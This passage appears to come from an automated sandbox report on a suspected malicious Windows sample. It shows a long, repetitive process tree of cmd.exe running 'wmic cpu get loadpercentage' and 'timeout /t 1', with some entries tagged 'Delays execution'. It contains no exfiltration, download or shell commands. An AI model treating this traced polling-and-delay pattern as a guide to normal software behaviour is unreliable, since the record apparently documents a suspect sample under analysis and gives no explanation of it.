  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:356
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4284
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2396
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3680
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3984
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:32
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4640
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4156
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2024
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1496
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2160
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3404
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3180
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5052
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1088
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3732
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3876
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2548
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4772
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2824
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4676
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:32
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:752
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4864
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1828
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4276
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5112
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2868
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1364
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4180
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1736
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2340
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3436
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:824
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:240
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4632
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4732
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4640
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4156
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1316
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5100
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3624
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1496
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:212
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2296
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3180
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1088
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1364
